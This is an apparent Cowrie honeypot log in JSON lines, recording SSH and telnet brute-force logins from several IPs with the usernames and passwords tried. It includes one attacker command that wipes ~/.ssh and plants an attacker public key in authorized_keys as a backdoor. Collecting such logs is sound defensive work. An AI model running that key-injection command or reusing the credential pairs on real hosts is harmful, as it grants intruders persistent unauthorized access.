{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:02:57.775310Z","src_ip":"5.202.105.236","session":"a0d956a0d925"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:02:57.928637Z","src_ip":"5.202.105.236","session":"a0d956a0d925"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:02:58.558211Z","src_ip":"5.202.105.236","session":"a0d956a0d925"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:02:58.703146Z","src_ip":"5.202.105.236","session":"a0d956a0d925"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:02:58.704151Z","src_ip":"5.202.105.236","session":"57defa66bc35"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":52688,"dst_ip":"1.2.3.4","dst_port":22,"session":"c850b7d81942","protocol":"ssh","message":"New connection: 152.32.129.236:52688 (1.2.3.4:22) [session: c850b7d81942]","sensor":"my-vps","timestamp":"2025-09-09T01:04:14.359454Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:04:14.360448Z","src_ip":"152.32.129.236","session":"c850b7d81942"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:04:14.570207Z","src_ip":"152.32.129.236","session":"c850b7d81942"}
{"eventid":"cowrie.login.failed","username":"zookeeper","password":"2025","message":"login attempt [zookeeper/2025] failed","sensor":"my-vps","timestamp":"2025-09-09T01:04:15.449659Z","src_ip":"152.32.129.236","session":"c850b7d81942"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:04:16.662401Z","src_ip":"152.32.129.236","session":"c850b7d81942"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":42302,"dst_ip":"1.2.3.4","dst_port":22,"session":"500da7eb194d","protocol":"ssh","message":"New connection: 5.202.105.236:42302 (1.2.3.4:22) [session: 500da7eb194d]","sensor":"my-vps","timestamp":"2025-09-09T01:04:17.627615Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:04:17.648467Z","src_ip":"5.202.105.236","session":"500da7eb194d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:04:17.806581Z","src_ip":"5.202.105.236","session":"500da7eb194d"}
{"eventid":"cowrie.login.failed","username":"app","password":"123","message":"login attempt [app/123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:04:18.362224Z","src_ip":"5.202.105.236","session":"500da7eb194d"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:04:19.504998Z","src_ip":"5.202.105.236","session":"500da7eb194d"}
{"eventid":"cowrie.session.connect","src_ip":"175.206.221.59","src_port":55125,"dst_ip":"1.2.3.4","dst_port":23,"session":"b4c830fbe362","protocol":"telnet","message":"New connection: 175.206.221.59:55125 (1.2.3.4:23) [session: b4c830fbe362]","sensor":"my-vps","timestamp":"2025-09-09T01:05:20.089502Z"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":35414,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f1a3aa3e4a3","protocol":"ssh","message":"New connection: 5.202.105.236:35414 (1.2.3.4:22) [session: 1f1a3aa3e4a3]","sensor":"my-vps","timestamp":"2025-09-09T01:05:34.443348Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:05:34.468867Z","src_ip":"5.202.105.236","session":"1f1a3aa3e4a3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:05:34.614193Z","src_ip":"5.202.105.236","session":"1f1a3aa3e4a3"}
{"eventid":"cowrie.login.success","username":"root","password":"ABcd@1234","message":"login attempt [root/ABcd@1234] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:05:35.191418Z","src_ip":"5.202.105.236","session":"1f1a3aa3e4a3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:05:35.532298Z","src_ip":"5.202.105.236","session":"1f1a3aa3e4a3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:05:35.532994Z","src_ip":"5.202.105.236","session":"1f1a3aa3e4a3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:05:35.534095Z","src_ip":"5.202.105.236","session":"1f1a3aa3e4a3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:05:35.671437Z","src_ip":"5.202.105.236","session":"1f1a3aa3e4a3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:05:36.046052Z","src_ip":"5.202.105.236","session":"1f1a3aa3e4a3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:05:36.047065Z","src_ip":"5.202.105.236","session":"1f1a3aa3e4a3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:05:36.191224Z","src_ip":"5.202.105.236","session":"1f1a3aa3e4a3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:05:36.192091Z","src_ip":"5.202.105.236","session":"1f1a3aa3e4a3"}
{"eventid":"cowrie.session.connect","src_ip":"87.121.84.85","src_port":60546,"dst_ip":"1.2.3.4","dst_port":23,"session":"7a8a47ae6848","protocol":"telnet","message":"New connection: 87.121.84.85:60546 (1.2.3.4:23) [session: 7a8a47ae6848]","sensor":"my-vps","timestamp":"2025-09-09T01:05:36.253352Z"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":35918,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7459e2bdea5","protocol":"ssh","message":"New connection: 5.202.105.236:35918 (1.2.3.4:22) [session: c7459e2bdea5]","sensor":"my-vps","timestamp":"2025-09-09T01:05:37.336278Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:05:37.342949Z","src_ip":"5.202.105.236","session":"c7459e2bdea5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:05:37.505039Z","src_ip":"5.202.105.236","session":"c7459e2bdea5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:05:38.083991Z","src_ip":"5.202.105.236","session":"c7459e2bdea5"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":43960,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a2bde358ab1","protocol":"ssh","message":"New connection: 152.32.129.236:43960 (1.2.3.4:22) [session: 1a2bde358ab1]","sensor":"my-vps","timestamp":"2025-09-09T01:05:38.401284Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:05:38.402366Z","src_ip":"152.32.129.236","session":"1a2bde358ab1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:05:38.664721Z","src_ip":"152.32.129.236","session":"1a2bde358ab1"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:05:39.238251Z","src_ip":"5.202.105.236","session":"c7459e2bdea5"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":36802,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ac403266b38","protocol":"ssh","message":"New connection: 5.202.105.236:36802 (1.2.3.4:22) [session: 2ac403266b38]","sensor":"my-vps","timestamp":"2025-09-09T01:05:39.384584Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:05:39.392257Z","src_ip":"5.202.105.236","session":"2ac403266b38"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:05:39.533511Z","src_ip":"5.202.105.236","session":"2ac403266b38"}
{"eventid":"cowrie.login.failed","username":"stack","password":"123","message":"login attempt [stack/123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:05:39.752806Z","src_ip":"152.32.129.236","session":"1a2bde358ab1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:05:40.143245Z","src_ip":"5.202.105.236","session":"2ac403266b38"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:05:40.286243Z","src_ip":"5.202.105.236","session":"1f1a3aa3e4a3"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:05:40.292808Z","src_ip":"5.202.105.236","session":"2ac403266b38"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:05:41.016395Z","src_ip":"152.32.129.236","session":"1a2bde358ab1"}
{"eventid":"cowrie.session.closed","duration":8.546062469482422,"message":"Connection lost after 8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:05:44.799342Z","src_ip":"87.121.84.85","session":"7a8a47ae6848"}
{"eventid":"cowrie.session.closed","duration":31.37266445159912,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:05:51.462097Z","src_ip":"175.206.221.59","session":"b4c830fbe362"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60484,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7ddb1249740","protocol":"ssh","message":"New connection: 217.72.205.35:60484 (1.2.3.4:22) [session: a7ddb1249740]","sensor":"my-vps","timestamp":"2025-09-09T01:05:55.904798Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:05:55.905861Z","src_ip":"217.72.205.35","session":"a7ddb1249740"}
{"eventid":"cowrie.session.connect","src_ip":"104.248.235.219","src_port":6103,"dst_ip":"1.2.3.4","dst_port":22,"session":"e00e37dbddd1","protocol":"ssh","message":"New connection: 104.248.235.219:6103 (1.2.3.4:22) [session: e00e37dbddd1]","sensor":"my-vps","timestamp":"2025-09-09T01:06:02.508069Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-09-09T01:06:02.609292Z","src_ip":"104.248.235.219","session":"e00e37dbddd1"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-09T01:06:02.705028Z","src_ip":"104.248.235.219","session":"e00e37dbddd1"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-s